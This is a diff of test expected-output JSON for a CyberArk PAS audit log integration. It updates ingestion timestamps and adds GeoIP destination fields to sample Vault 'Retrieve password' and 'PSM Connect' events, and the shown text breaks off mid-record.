\u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-centos8-PSMApp_VAGRANT\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003esdfsdf\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMApp_VAGRANT\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"centos8\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:54:20\",\"IsoTimestamp\":\"2021-03-11T16:54:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSH-centos8-PSMApp_VAGRANT\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"sdfsdf\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"PSMApp_VAGRANT\"},{\"Name\":\"Address\",\"Value\":\"centos8\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "295", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json index 8ae5563f787..7064f411858 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json @@ -82,7 +82,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331129200Z", + "ingested": "2021-12-14T14:42:12.780164303Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.7\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Tesla\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"300\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.7\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Tesla\"}]}}}}", "code": "300", "kind": "event", @@ -106,10 +106,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -191,7 +200,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331138600Z", + "ingested": "2021-12-14T14:42:12.780166749Z", "original": "\u003c5\u003e1 2021-03-11T17:38:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:20\",\"IsoTimestamp\":\"2021-03-11T17:38:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -215,10 +224,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -300,7 +318,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331144600Z", + "ingested": "2021-12-14T14:42:12.780167186Z", "original": "\u003c5\u003e1 2021-03-11T17:46:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:56\",\"IsoTimestamp\":\"2021-03-11T17:46:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -324,10 +342,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -409,7 +436,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331150400Z", + "ingested": "2021-12-14T14:42:12.780167584Z", "original": "\u003c5\u003e1 2021-03-11T17:48:34Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:34\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:34Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:34\",\"IsoTimestamp\":\"2021-03-11T17:48:34Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -433,10 +460,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -518,7 +554,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331156200Z", + "ingested": "2021-12-14T14:42:12.780168072Z", "original": "\u003c5\u003e1 2021-03-11T17:54:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:54:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:54:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:54:56\",\"IsoTimestamp\":\"2021-03-11T17:54:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -542,10 +578,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -627,7 +672,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331162200Z", + "ingested": "2021-12-14T14:42:12.780168489Z", "original": "\u003c5\u003e1 2021-03-11T17:56:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 